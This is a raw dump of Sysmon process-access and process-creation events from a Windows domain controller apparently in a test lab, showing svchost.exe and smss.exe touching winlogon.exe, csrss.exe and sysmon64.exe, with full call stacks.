12:02:09.194{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+2380c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003924Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.194{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+237c4|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003923Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.194{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003922Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.194{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003921Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.194{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003920Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.194{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003919Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.194{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003918Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.194{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003917Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.194{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003916Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.194{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003915Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.194{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003914Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.194{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9100-00000000AE01}5108C:\Windows\system32\csrss.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+1ac1c|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 
10341000x80000000000000003913Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.194{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1abf6|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000003912Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.194{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+1abdc|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000003911Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.194{266CAFBE-64C1-6064-9000-00000000AE01}40844092C:\Windows\System32\smss.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\SYSTEM32\ntdll.dll+8c58e|C:\Windows\SYSTEM32\ntdll.dll+8c339|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+2042|\SystemRoot\System32\smss.exe+1d5e|\SystemRoot\System32\smss.exe+1b09|\SystemRoot\System32\smss.exe+14cb|\SystemRoot\System32\smss.exe+130f|\SystemRoot\System32\smss.exe+1096|C:\Windows\SYSTEM32\ntdll.dll+5182f 154100x80000000000000003910Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.191{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\System32\winlogon.exe10.0.14393.3204 (rs1_release.190830-1500)Windows Logon ApplicationMicrosoft® Windows® 
Operating SystemMicrosoft CorporationWINLOGON.EXEwinlogon.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e72SystemMD5=DEA4CE12F24601830083126E18A2C7C9,SHA256=F002F8C2EA49D21F242996E3D57F5FDD7995FE6DB524BB69BBD7F190CC0211A9,IMPHASH=3CF10D94C117DB4F6E9D523B93429D6D{266CAFBE-64C1-6064-9000-00000000AE01}4084C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000110 0000007c 10341000x80000000000000003909Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.178{266CAFBE-6467-6064-0200-00000000AE01}4321028C:\Windows\System32\smss.exe{266CAFBE-64C1-6064-9100-00000000AE01}5108C:\Windows\system32\csrss.exe0x101441C:\Windows\SYSTEM32\ntdll.dll+a6c14|\SystemRoot\System32\smss.exe+3fee|\SystemRoot\System32\smss.exe+3b53|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000003908Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.178{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9100-00000000AE01}5108C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+1a7a4|c:\windows\system32\lsm.dll+1aa31|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003907Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.162{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003906Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.162{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003905Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.162{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003904Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.162{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003903Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.162{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003902Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.162{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003901Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.162{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003900Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 